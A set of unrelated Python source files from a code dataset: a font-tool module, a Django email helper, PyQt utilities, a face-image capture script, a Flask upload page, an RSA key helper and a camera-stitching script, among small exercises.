progressBar.update(\"Compressing UFOs...\")\n recursivelyCompressUFOs(stateDirectory)\n # make the diffs\n if settings[\"makeVisualDiffsReport\"]:\n if progressBar:\n progressBar.update(\"Making visual differences report...\")\n candidates = getDiffStateCandidates(root)\n candidates.remove(\"Current\")\n candidates.remove(stamp)\n candidates.sort()\n if candidates:\n report = compileDiffReport(\n root,\n candidates[-1],\n stamp,\n normalize=settings[\"normalizeDataInVisualDiffsReport\"],\n onlyCompareFontDefaultLayers=settings[\"onlyDefaultLayerInVisualDiffsReport\"]\n )\n report = report.encode(\"utf8\")\n reportPath = os.path.join(stateDirectory, makeDiffReportFileName(stamp))\n f = open(reportPath, \"wb\")\n f.write(report)\n f.close()\n # make the proofs\n if settings[\"makeGlyphSetProof\"]:\n if progressBar:\n progressBar.update(\"Making glyph set proof...\")\n from freezeDryer import proof\n proof.makeGlyphSetProof(stateDirectory, stamp, makeProofFileName(stamp))\n\ndef makeMessageFileName(stamp):\n return stamp + \" message.txt\"\n\ndef makeProofFileName(stamp):\n return stamp + \" glyphs.pdf\"\n\ndef 
makeDiffReportFileName(stamp):\n return stamp + \" diffs.html\"\n\n# -----\n# Tools\n# -----\n\ndef findRoot(directory, level=0):\n \"\"\"\n Find the root directory for a project\n for any given directory <= 10 sub-directories\n below the root directory.\n \"\"\"\n if haveSettings(directory):\n return directory\n level += 1\n if level <= 10:\n return findRoot(os.path.dirname(directory), level)\n return None\n\ndef gatherIgnoredPaths(directory, ignorePatterns, level=0):\n found = []\n # match file names\n for pattern in ignorePatterns:\n if pattern.startswith(\"/\") and level > 0:\n continue\n elif pattern.startswith(\"/\"):\n pattern = pattern[1:]\n fullPattern = os.path.join(directory, pattern)\n found += glob.glob(fullPattern)\n # recurse through sub-directories\n level += 1\n for fileName in os.listdir(directory):\n if os.path.splitext(fileName)[-1].lower() == \".ufo\":\n continue\n fullPath = os.path.join(directory, fileName)\n if fullPath in found:\n continue\n if os.path.isdir(fullPath):\n found += gatherIgnoredPaths(fullPath, ignorePatterns, level)\n return found\n\n# ---------------\n# UFO Compression\n# ---------------\n\ndef gatherUFOPaths(directory):\n ufos = []\n for fileName in os.listdir(directory):\n path = os.path.join(directory, fileName)\n if os.path.splitext(fileName)[-1].lower() in (\".ufo\", \".ufoz\"):\n ufos.append(path)\n elif os.path.isdir(path):\n ufos += gatherUFOPaths(path)\n return ufos\n\ndef recursivelyCompressUFOs(directory):\n paths = gatherUFOPaths(directory)\n for path in paths:\n if os.path.splitext(path)[-1].lower() == \".ufoz\":\n continue\n convertUFOToUFOZ(path)\n\ndef convertUFOToUFOZ(path):\n ufozPath = os.path.splitext(path)[0] + \".ufoz\"\n zipPath = shutil.make_archive(\n ufozPath,\n \"zip\",\n os.path.dirname(path),\n os.path.basename(path)\n )\n os.rename(zipPath, ufozPath)\n shutil.rmtree(path)\n","sub_path":"build/Freeze Dryer.roboFontExt/lib/freezeDryer/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":10834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"497972967","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport hashlib\nfrom email.mime.base import MIMEBase\nfrom django.core.mail import EmailMultiAlternatives, SafeMIMEMultipart\n\n\nclass EmailMultiRelatedCore(EmailMultiAlternatives):\n \"\"\"\n A version of EmailMessage that makes it easy to send multipart/related\n messages. For example, including text and HTML versions with inline images.\n \"\"\"\n related_subtype = 'related'\n\n def __init__(self, *args, **kwargs):\n self.related_attachments = []\n self.related_attachments_filename_content_id = []\n super(EmailMultiRelatedCore, self).__init__(*args, **kwargs)\n\n def attach_related(self, filename=None, content=None, mimetype=None, filename_content_id=None):\n \"\"\"\n Attaches a file with the given filename and content. 
The filename can\n be omitted and the mimetype is guessed, if not provided.\n\n If the first parameter is a MIMEBase subclass it is inserted directly\n into the resulting message attachments.\n \"\"\"\n if filename_content_id is None:\n m = hashlib.md5()\n m.update(filename)\n filename_content_id = m.hexdigest()\n if filename_content_id not in self.related_attachments_filename_content_id:\n if isinstance(filename, MIMEBase):\n assert content == mimetype == None\n self.related_attachments.append(filename)\n else:\n assert content is not None\n self.related_attachments.append((filename, content, mimetype, filename_content_id))\n self.related_attachments_filename_content_id.append(filename_content_id)\n return filename_content_id\n\n def attach_related_file(self, path, mimetype=None):\n \"\"\"Attaches a file from the filesystem.\"\"\"\n filename = os.path.basename(path)\n content = open(path, 'rb').read()\n return self.attach_related(filename, content, mimetype)\n\n def _create_message(self, msg):\n return self._create_attachments(self._create_related_attachments(self._create_alternatives(msg)))\n\n def _create_related_attachments(self, msg):\n encoding = self.encoding or 'utf-8'\n if self.related_attachments:\n body_msg = msg\n msg = SafeMIMEMultipart(_subtype=self.related_subtype, encoding=encoding)\n if self.body:\n msg.attach(body_msg)\n for related in self.related_attachments:\n msg.attach(self._create_related_attachment(*related))\n return msg\n\n def _create_related_attachment(self, filename, content, mimetype=None, filename_content_id=None):\n \"\"\"\n Convert the filename, content, mimetype triple into a MIME attachment\n object. Adjust headers to use Content-ID where applicable.\n Taken from http://code.djangoproject.com/ticket/4771\n \"\"\"\n attachment = super(EmailMultiRelated, self)._create_attachment(filename, content, mimetype)\n if filename:\n mimetype = attachment['Content-Type']\n del(attachment['Content-Type'])\n del(attachment['Content-Disposition'])\n attachment.add_header('Content-Disposition', 'inline', filename=filename)\n attachment.add_header('Content-Type', mimetype, name=filename)\n attachment.add_header('Content-ID', '<%s>' % filename_content_id)\n return attachment\n\n\nclass EmailMultiRelated(EmailMultiRelatedCore):\n def make_body(self, text):\n try:\n from bs4 import BeautifulSoup, FeatureNotFound\n from bs4.element import Comment\n\n html = BeautifulSoup(text, 'lxml')\n # remove comments from text\n for c in html.find_all(text=lambda t: isinstance(t, Comment)):\n c.extract()\n # set links from a tag to text\n for tag in html.find_all(True):\n if tag.name == 'a':\n href = tag.attrs.get('href', '')\n if href and not href.startswith('#'):\n contents = reduce(lambda x, y: unicode(x) + unicode(y), tag.contents) if tag.contents else ''\n if href.find(contents) != -1:\n tag.replace_with(' %s ' % href)\n elif href != contents:\n tag.replace_with('%s %s ' %(contents, href))\n self.body = html.get_text().strip()\n self.attach_alternative(text, 'text/html')\n except (ImportError, FeatureNotFound):\n pass\n\n def set_body_template(self, template_name, dictionary=None):\n \"\"\"\n Render template using django template\n \"\"\"\n\n # need to create new environment with self object\n from django.template.loader import get_template\n from django.template.context import Context\n\n t = get_template(template_name)\n dictionary = dictionary if dictionary is not None else {}\n dictionary['emailmultirelated_object'] = self\n self.make_body(t.render(Context(dictionary)))\n\n def 
set_body_template_jinja2(self, template_name, dictionary=None):\n        \"\"\"\n        Render template using jinja\n        requires coffin\n        \"\"\"\n\n        # need to create new environment with self object\n        from coffin.common import get_env\n        from jinja import email_embedded_media\n\n        env = get_env()\n        env.add_extension(email_embedded_media)\n        env.email_object_instance = self\n        template = env.get_template(template_name)\n        self.make_body(template.render(dictionary))\n\n\n","sub_path":"emailmultirelated/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":5582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"525812910","text":"from PyQt4.QtCore import QThread\nimport sys\n\n\nclass WorkerThread(QThread):\n    def __init__(self,function=None, *args, **kwargs):\n        QThread.__init__(self)\n        self.function = function\n        self.args = args\n        self.kwargs = kwargs\n        self.queue=list()\n        self.canDropJobs=False\n        self.finished.connect(self.threadFinished)\n        self.isFinalized=False\n\n    def __del__(self):\n        if self.isFinalized==False:\n            self.finalize()\n\n    def finalize(self,timeout=5000):\n        self.isFinalized=True\n        self.start=self.blockStart  # block any further start() calls once finalized\n        self.quit()\n        if self.isRunning():\n            if timeout==None:\n                self.wait()\n            else:\n                if not(self.wait(timeout)):\n                    raise Exception("Finalizing the WorkerThread timed out, could not terminate thread")\n\n\n    def blockStart(self):\n        pass\n\n    def threadFinished(self):\n        if len(self.queue)!=0:\n            job=self.queue.pop(0)\n            
self.function=job[\"func\"]\n self.args = job[\"args\"]\n self.kwargs = job[\"kwargs\"]\n self.start()\n\n\n def scheudelFunction(self,function, *args, **kwargs):\n if self.isRunning() :\n self.queue.append({\"func\":function,\"args\":args,\"kwargs\":kwargs})\n else:\n self.function=function\n self.args = args\n self.kwargs = kwargs\n self.start()\n\n def executeFunction(self,function, *args, **kwargs):\n self.function=function\n self.args = args\n self.kwargs = kwargs\n if not self.isRunning():\n self.start()\n else:\n if not self.canDropJobs:\n raise Exception(\"Worker Thread was still busy: Could not execute Function\")\n\n def quit(self):\n self.jobs={}\n QThread.quit(self)\n\n def run(self):\n try:\n self.function(*self.args,**self.kwargs)\n except:\n (type, value, traceback) = sys.exc_info()\n sys.excepthook(type, value, traceback)\n return","sub_path":"current_code/DiffTASLab/oldstuff/WorkerThread.py","file_name":"WorkerThread.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"418430721","text":"import numpy as numpy\nimport cv2\nimport os, time\nimport dlib\nfrom imutils import face_utils\nfrom imutils.face_utils import FaceAligner\n\ndetector = dlib.get_frontal_face_detector()\nshape_predictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\nface_aligner = FaceAligner(shape_predictor, desiredFaceWidth=200)\n\nuser_db_dir = \"images/\"\n\n\ndef create_folder(folder_name):\n if not os.path.exists(folder_name):\n os.mkdir(folder_name)\n\ndef main():\n create_folder(user_db_dir)\n while True:\n name=input(\"Please enter the User Name: \")\n userId = input(\"Enter User id for {}: \".format(name))\n try:\n # userId = int(userId)\n userFolder = user_db_dir + str(name) + \"/\"\n create_folder(userFolder)\n break\n except:\n print(\"Unable to Create user folder.\")\n continue\n\n # get beginning image number\n while True:\n init_img_no = input(\"Starting img no.: \")\n try:\n init_img_no = int(init_img_no)\n break\n except:\n print(\"Starting img no should be integer...\")\n continue\n\n img_no = init_img_no\n cap = cv2.VideoCapture(0)\n total_imgs = 10\n while True:\n ret, img = cap.read()\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n faces = detector(img_gray)\n if len(faces) == 1:\n face = faces[0]\n (x, y, w, h) = face_utils.rect_to_bb(face)\n face_img = img_gray[y-50:y + h+100, x-50:x + w+100]\n face_aligned = face_aligner.align(img, img_gray, face)\n\n face_img = face_aligned\n img_path = userFolder + name + str(img_no) + \".jpg\"\n cv2.imwrite(img_path, face_img)\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 255, 0), 3)\n cv2.imshow(\"aligned\", face_img)\n img_no += 1\n\n cv2.imshow(\"Saving\", img)\n cv2.waitKey(1)\n if img_no == init_img_no + total_imgs:\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\nmain()\n","sub_path":"add_user_to_database.py","file_name":"add_user_to_database.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"89116990","text":"import os\nfrom flask import Flask, request, secure_filename\n\napp = Flask(__name__)\n\ndef get_my_ip():\n return request.environ.get('HTTP_X_REAL_IP', request.remote_addr)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n UPLOAD_FOLDER = os.path.join(os.getcwd(), 'Upload_Folder')\n app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n if not os.path.exists(UPLOAD_FOLDER):\n 
os.makedirs(UPLOAD_FOLDER)\n\n    if request.method == 'POST':\n        file = request.files['file']\n        filename = secure_filename(file.filename)\n        file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n    return '''\n\n    <!doctype html>\n    <title>Upload new File</title>\n    <h1>Upload new File</h1>\n    <form method=post enctype=multipart/form-data>\n      <input type=file name=file>\n      <input type=submit value=Upload>\n    </form>\n    ''' + 'Your IP: ' + '<b>' + \\\n\t\tget_my_ip() + '</b>' + '<br>
'\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8080)\n","sub_path":"Flask_TEST/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"643818156","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import login, logout\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\n\n\ndef frontpage(request):\n if request.user.is_authenticated:\n return redirect('/profile')\n\n if request.method == 'POST':\n if 'signupform' in request.POST:\n signupform = UserCreationForm(data=request.POST)\n signinform = AuthenticationForm()\n\n if signupform.is_valid():\n username = signupform.cleaned_data['username']\n password = signupform.cleaned_data['password1']\n signupform.save()\n return redirect('/')\n else:\n signupform = UserCreationForm()\n signinform = AuthenticationForm(data=request.POST)\n\n if signinform.is_valid():\n login(request, signinform.get_user())\n return redirect('/')\n\n\n signupform = UserCreationForm()\n signinform = AuthenticationForm()\n\n return render(request, 'frontpage.html', {'signupform': signupform,\n 'signinform': signinform})\n\n\ndef signout(request):\n logout(request)\n return redirect('/')\n\n\ndef profile(request):\n return render(request, 'profile.html')\n","sub_path":"nyt_api/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"13640678","text":"n = int(input())\nd = {}\nfor i in range(n):\n name, gpa = map(str, input().split())\n if name not in d:\n d[name] = [gpa]\n else:\n d[name] += [gpa]\nfor i in d:\n s = 0\n for j in d[i]:\n s += int(j)\n gpa = s/len(d[i])\n d[i] = float(\"{0:.3f}\".format(gpa))\nd = sorted(d.items(), key=lambda k: (-k[1], k[0]))\nfor x, y in d:\n print(x, end=\" \")\n print(\"{0:.3f}\".format(y))\n","sub_path":"solve-problems/exam/j.py","file_name":"j.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"117602865","text":"n = int(input(\"Enter N: \"))\nm = n*3\n\ns = input(\"Enter String: \")\nmid = int(n/2)\n\npatt= \".|.\"\ndash = \"-\"\nlength = len(s)\n\ndef printW(num):\n print(dash* int(num))\n\ndef f1(i):\n pattSize = len(patt*i)\n w = (m-pattSize)/2\n a= dash* int(w)+ patt *i + dash* int(w)\n if(len(a)<=m):\n print(a)\n else:\n print(dash* int(w)+ patt *(i-int((len(a)-m)/2)) + dash* int(w))\n\n\ndef printStr():\n w= len(s)\n print(dash* int((m-w)/2) + s + dash* int((m-w)/2))\n \ndef run():\n i=1\n while( i=1):\n f1(i)\n i-=2\n \nrun()\n","sub_path":"Working codes/toImproveQ4.py","file_name":"toImproveQ4.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"238355454","text":"from cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives.serialization import load_pem_public_key\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives import hashes\nimport os.path\n\n\ndef generate_key():\n key = rsa.generate_private_key(public_exponent=65537, key_size=4096, backend=default_backend())\n if 
os.path.isfile(\"./Key_database/rsa_key.keydb.pem\"):\n return 0\n with open(\"./Key_database/rsa_key.keydb.pem\", \"wb+\") as f:\n f.write(key.private_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.TraditionalOpenSSL,\n encryption_algorithm=serialization.BestAvailableEncryption(b\"forty2\"),\n )\n )\n\n\ndef load_private_key():\n if not os.path.isfile(\"./Key_database/rsa_key.keydb.pem\"):\n generate_key()\n with open(\"./Key_database/rsa_key.keydb.pem\", \"r\") as f:\n key = serialization.load_pem_private_key(f.read().encode('utf-8'), b\"forty2\", backend=default_backend())\n # print(key)\n return key\n\n\ndef load_public_key():\n return load_private_key().public_key()\n\n\ndef encrypt_key(message, public_key):\n encoded_message = message.public_bytes(encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.PKCS1)\n #print('Message: ', encoded_message)\n #print('Message len: ', len(encoded_message))\n head_encoded_message = encoded_message[:int(len(encoded_message)/2)]\n tail_encoded_message = encoded_message[int(len(encoded_message)/2): len(encoded_message)]\n #print('Message: ', head_encoded_message)\n #print('Message: ', tail_encoded_message)\n\n head_cipher_text = public_key.encrypt(\n head_encoded_message, padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA1()),\n algorithm=hashes.SHA1(),\n label=None\n )\n )\n\n tail_cipher_text = public_key.encrypt(\n tail_encoded_message, padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA1()),\n algorithm=hashes.SHA1(),\n label=None\n )\n )\n\n return head_cipher_text, tail_cipher_text\n\n\ndef decrypt_msg(msg):\n private_key = load_private_key()\n\n plaintext = private_key.decrypt(\n msg, padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA1()),\n algorithm=hashes.SHA1(),\n label=None\n )\n )\n return plaintext\n\n\ndef encrypt_msg(msg, public_key):\n\n cipher_text = public_key.encrypt(\n msg, padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA1()),\n algorithm=hashes.SHA1(),\n label=None\n )\n )\n\n return cipher_text\n","sub_path":"Crypto_project/Comp3334/Client/Encryption/RSA.py","file_name":"RSA.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"81521355","text":"# Написати функцію, яка приймає на вхід список і підраховує кількість однакових елементів у ньому.\r\n\r\nlst = [1,2,3,4,4,4,4,1,3,1,1]\r\n\r\ndef elements(el):\r\n a = {}\r\n for i in el:\r\n if i in a.keys():\r\n b = a[i]\r\n a.pop(i)\r\n a[i] = b+1\r\n else:\r\n a[i] = 1\r\n print(a)\r\n return(a)\r\n\r\nelements(lst)\r\n","sub_path":"HT_3/task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"259549422","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import QTimer, QTime\n\n#QLCDNumber 레퍼런스\n#https://doc.qt.io/qt-5/qlcdnumber.html#setDigitCount\n\nclass MyWindow(QWidget):\n def __init__(self):\n super().__init__()\n self.timer = QTimer(self)\n self.timer.setInterval(1000) #시간간격 1초\n self.timer.timeout.connect(self.timeout) #timeout 이벤트줄때 connect와 연결\n self.setWindowTitle('QTimer') #윈도우 타이틀\n self.setGeometry(100, 100, 600, 280) #윈도우 상단 100, 100, 그림의 크기 width, height\n\n layout = QVBoxLayout() #Layout은 BoxLayout\n\n self.lcd = QLCDNumber() #PyQt에서 전자시계를 표현하는 QLCD클래스\n self.lcd.display('') # 디스플레이에 보이는 내용을 비움\n self.lcd.setDigitCount(8) #디지털 시계의 자리수\n subLayout = QHBoxLayout() 
#VBoxLayout안에 넣을 가로방향 QHBoxLayout\n\n self.btnStart = QPushButton(\"시작\") #버튼 만듦\n self.btnStart.clicked.connect(self.onStartButtonClicked) #버튼이벤트 등록\n\n self.btnStop = QPushButton(\"멈춤\") #멈춤 버튼 만듦\n self.btnStop.clicked.connect(self.onStopButtonClicked) # 버튼 이벤트 등록\n\n layout.addWidget(self.lcd) #QLCDNumber 객체화면에 등록\n\n subLayout.addWidget(self.btnStart) #버튼 화면에 등록\n subLayout.addWidget(self.btnStop) #버튼 화면에 등록\n layout.addLayout(subLayout) #서브 Layout 등록\n\n self.btnStop.setEnabled(False) #클릭시 비활성\n self.setLayout(layout)\n\n def onStartButtonClicked(self):\n self.timer.start() #타이머 스레드 시작\n self.btnStop.setEnabled(True) #stop버튼 활성\n self.btnStart.setEnabled(False) #start버튼 활성\n\n def onStopButtonClicked(self):\n self.timer.stop() #타이머 멈춤\n self.btnStop.setEnabled(False) #stop버튼 비활성\n self.btnStart.setEnabled(True) #start버튼 활성\n\n def timeout(self):\n sender = self.sender() #이벤트 객체에 접근자\n currentTime = QTime.currentTime().toString(\"hh:mm:ss\") #현재시간 표시 e.g 11:50:32\n if id(sender) == id(self.timer): #접근자와 timer가 같으면 화면에 표시\n self.lcd.display(currentTime)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n myWindow = MyWindow()\n myWindow.show()\n sys.exit(app.exec_())","sub_path":"OpenCV/OpenCV/pyqt/pyqt_clock.py","file_name":"pyqt_clock.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"190401455","text":"import cv2\nimport numpy as np\nimport math\nimport camera as camera\nimport plot_helper as plot_helper\nimport matplotlib.pyplot as plt\nfrom pyexcel_ods import get_data\nfrom itertools import cycle\n\n#https://github.com/eborboihuc/rotate_3d\n#https://python-projective-camera-model.readthedocs.io/en/latest/api.html\n\ndef swap_rows(input_matrix, ix, iy, iz):\n swap_matrix = input_matrix.copy()\n swap_matrix[0, :] = input_matrix[ix, :]\n swap_matrix[1, :] = input_matrix[iy, :]\n swap_matrix[2, :] = input_matrix[iz, :]\n return swap_matrix\n\ndef get_2d_points(array):\n array_2d = []\n for point in array:\n array_2d.append(point[0:2])\n return np.array(array_2d, np.float32)\n\ndef set_roi( stitch_image, roi_image, all_height, all_width, image_height, height_offset):\n hA = int(all_height - height_offset - image_height)\n wA = int(0)\n hB = int(all_height - height_offset)\n wB = int(all_width)\n stitch_image[hA:hB, wA:wB] += roi_image\n\ndef line_intersection(x1_1, x1_2, y1_1, y1_2, x2_1, x2_2, y2_1, y2_2):\n A1 = y1_1 - y1_2\n B1 = x1_2 - x1_1\n C1 = x1_1 * y1_2 - x1_2 * y1_1\n A2 = y2_1 - y2_2\n B2 = x2_2 - x2_1\n C2 = x2_1 * y2_2 - x2_2 * y2_1\n\n x = None\n y = None\n if B1 * A2 - B2 * A1 and A1:\n y = (C2 * A1 - C1 * A2) / (B1 * A2 - B2 * A1)\n x = (-C1 - B1 * y) / A1\n elif B1 * A2 - B2 * A1 and A2:\n y = (C2 * A1 - C1 * A2) / (B1 * A2 - B2 * A1)\n x = (-C2 - B2 * y) / A2\n\n return np.array([x,y])\n\ndata = get_data(\"dataset/metadata-v1_manual.ods\")\n\n# Read Image\nitems = list(data.items())\n\ninput_rt = []\norg_img = []\ninput_avg_rt = np.zeros((4,4))\n\nindex = 1\nnp.set_printoptions(formatter={'float': lambda x: \"{0:0.3f}\".format(x)})\n\nwhile index < len(items[0][1]):\n if(items[0][1][index]):\n img_path = \"dataset/snapshots/\"+items[0][1][index][0]\n im = cv2.imread(img_path)\n org_img.append(im)\n size = im.shape\n\n w = size[1]\n h = size[0]\n\n s = items[0][1][index][1]\n s = s.replace('[', '')\n s = s.replace(']', '')\n s = s.replace('\\n', ' ')\n\n rt_matrix = np.fromstring(s, sep=' ').reshape(4,4)\n input_rt.append(rt_matrix)\n input_avg_rt += 
rt_matrix\n\n index+=1\n\ninput_avg_rt = np.array( ( 1 / len( input_rt ) ) * input_avg_rt )\nprint(\"Input avg rt:\\n {0}\".format(input_avg_rt))\n\nix = np.argmin(np.fabs(input_avg_rt[0:3,3]),axis=0)\niy = np.argmax(np.fabs(input_avg_rt[0:3,3]),axis=0)\niz = 3 - ( ix + iy )\n\navg_rt = swap_rows(input_avg_rt, ix, iy, iz)\nprint(\"Avg rt:\\n {0}\".format(avg_rt))\n\nindex = 0\nmax_z = input_rt[index][iz,3]\ninput_rt[index] = swap_rows(input_rt[index], ix, iy, iz)\nprint(\"rt({0}):\\n {1}\".format(index,input_rt[index]))\n\nindex = 1\nwhile index < len(input_rt):\n max_z = np.min((max_z, input_rt[index][iz,3]))\n input_rt[index] = swap_rows(input_rt[index], ix, iy, iz)\n print(\"rt({0}):\\n {1}\".format(index,input_rt[index]))\n index += 1\n\nprint(\"Max z:\\n {0}\".format(max_z))\n\navg_rt_sign = np.sign(avg_rt)\nbasis = np.zeros(avg_rt.shape)\n\nindex = 0\nwhile index < avg_rt.shape[1]:\n basis[index,index] = avg_rt_sign[index,index]\n index += 1\n\nprint(\"Basis:\\n {0}\".format(basis))\n\nfov_x = 38.2 * math.pi / 180\nfov_y = 29.1 * math.pi / 180\nc_x = w / 2\nc_y = h / 2\n\nf_x = w * math.tan(fov_x)\nf_y = h * math.tan(fov_y)\n\ncamera_views = []\noutput_camera_views = []\nmax_tz = 0\n\nindex = 0\nwhile index < len(input_rt):\n R = np.array(input_rt[index][0:3, 0:3])\n cam_pos = np.array(input_rt[index][0:3, [3]])\n t = -R.dot(cam_pos)\n\n if index == 0:\n max_tz = t[2]\n max_tz = np.max((max_tz,t[2]))\n\n print(\"\\nCamera: {0}\".format(index))\n print(\"Cam possition:\\n {0}\".format(cam_pos))\n print(\"R:\\n {0}\".format(R))\n print(\"t:\\n {0}\".format(t))\n\n input_cam = camera.Camera(index)\n input_cam.set_K_elements(u0_px=c_x, v0_px=c_y, fx=f_x,fy=f_x)\n input_cam.set_R(R)\n input_cam.set_t(t)\n camera_views.append(input_cam)\n\n index += 1\n\nscena = plot_helper.prepare_plot(\"Scena\")\n\ncycol = cycle('bgrcmk')\n\nimage_center = np.array([[w/2, h/2]]).T\nimage_points = [np.array([[0., 0]]).T, np.array([[0., h - 1]]).T, np.array([[w - 1, h - 1]]).T, np.array([[w - 1, 0]]).T]\n\nfor cam in camera_views:\n world_center = cam.image_to_world(image_center, z=0)\n\n world_points = []\n output_points = []\n for point in image_points:\n world_points.append(cam.image_to_world(point, z=0))\n\n input_cam_pos = -cam.R.T.dot(cam.t)\n\n x = world_center[0,0]\n y = world_center[1,0]\n z = world_center[2,0]\n\n output_cam_pos = np.array([[avg_rt[0,3]],[y],[-max_z]])\n output_t = -np.eye(3).dot(output_cam_pos)\n output_t = np.array(output_t)\n\n\n R = np.array([[-1, +0, +0],\n [+0, +1, +0],\n [+0, +0, -1]])\n\n output_cam = camera.Camera(cam.id)\n output_cam.set_K(cam.K)\n output_cam.set_R(R)\n output_cam.set_t(output_t)\n\n\n for point in world_points:\n output_points.append(output_cam.world_to_image(point))\n\n output_cam.M = cv2.getPerspectiveTransform(get_2d_points(image_points), get_2d_points(output_points))\n output_cam.world_center = output_cam_pos\n output_cam.world_points = world_points\n output_cam.output_points = output_points\n output_camera_views.append(output_cam)\n\n line_color = next(cycol)\n plot_helper.plot_camera(scena, input_cam_pos, cam.R, 5)\n plot_helper.plot_point(scena, world_center, line_color)\n plot_helper.plot_point(scena,input_cam_pos, line_color)\n plot_helper.plot_line(scena, world_center, input_cam_pos, line_color,':')\n\n plot_helper.plot_camera(scena, output_cam_pos, output_cam.R, 5)\n plot_helper.plot_line(scena, world_center, output_cam_pos, line_color, ':')\n plot_helper.plot_point(scena, output_cam_pos, line_color)\n\n plot_helper.plot_line(scena, 
world_points[0], world_points[1], line_color, '-')\n plot_helper.plot_line(scena, world_points[1], world_points[2], line_color, '-')\n plot_helper.plot_line(scena, world_points[2], world_points[3], line_color, '-')\n plot_helper.plot_line(scena, world_points[3], world_points[0], line_color, '-')\n\ni = 1\nwhile i < len(output_camera_views):\n j = i\n while j > 0 and output_camera_views[j-1].world_center[1,0] > output_camera_views[j].world_center[1,0]:\n cam = output_camera_views[j-1].copy()\n output_camera_views[j - 1] = output_camera_views[j].copy()\n output_camera_views[j] = cam\n j -= 1\n i += 1\n\nheight = 0\nmax_w = w\nmax_h = h\nindex = 0\nwhile index < len(output_camera_views):\n if index == 0:\n cam1 = output_camera_views[index]\n else:\n cam1 = output_camera_views[index-1]\n\n cam2 = output_camera_views[index]\n\n poly_points = np.array(((cam2.output_points[0][0:2]),\n (cam2.output_points[1][0:2]),\n (cam2.output_points[2][0:2]),\n (cam2.output_points[3][0:2])), dtype=int)\n\n px, py, pw, ph = cv2.boundingRect(poly_points)\n max_w = np.max((max_w, pw + px))\n max_h = np.max((max_h, ph + py))\n\n cam11_center = cam1.world_to_image(cam1.world_center)\n cam12_center = cam1.world_to_image(cam2.world_center)\n cam21_center = cam2.world_to_image(cam1.world_center)\n\n # height += cam11_center[1] - cam12_center[1]\n height += cam12_center[1]\n # height += cam21_center[1]\n index += 1\n\nheight = int(np.round(height + max_h))\n\nprint(\"Height {0}\".format(height))\n\nstitch_image_all = np.zeros((height,max_w,3), np.uint8)\nstitch_image_poly = np.zeros((height,max_w,3), np.uint8)\n\nheight_offset = 0\nindex = 0\nwhile index < len(output_camera_views):\n\n if index == 0:\n cam1 = output_camera_views[index]\n else:\n cam1 = output_camera_views[index-1]\n\n cam0 = output_camera_views[0]\n cam2 = output_camera_views[index]\n\n cam11_center = cam1.world_to_image(cam1.world_center)\n cam12_center = cam1.world_to_image(cam2.world_center)\n cam21_center = cam2.world_to_image(cam1.world_center)\n cam00_center = cam0.world_to_image(cam0.world_center)\n cam20_center = cam2.world_to_image(cam0.world_center)\n\n # height_offset += int(cam11_center[1] - cam12_center[1])\n height_offset += int(cam12_center[1])\n # height_offset += int(cam21_center[1])\n points_height_offset = height - height_offset - max_h\n\n print(\"Stitch {0}\\n{1} {2} {3} {4} {5}\".format(index, cam11_center[1], cam12_center[1], cam21_center[1], cam11_center[1] - cam12_center[1], cam11_center[1] - cam21_center[1]))\n\n poly_points = np.array(((cam2.output_points[0][0:2]),\n (cam2.output_points[1][0:2]),\n (cam2.output_points[2][0:2]),\n (cam2.output_points[3][0:2])), dtype=int)\n\n i = 0\n while i < len(poly_points):\n poly_points[i][1] += points_height_offset\n i += 1\n\n lineThickness = 5\n\n cv2.line(stitch_image_poly, (poly_points[0][0], poly_points[0][1]), (poly_points[1][0], poly_points[1][1]), (0, 255, 0), 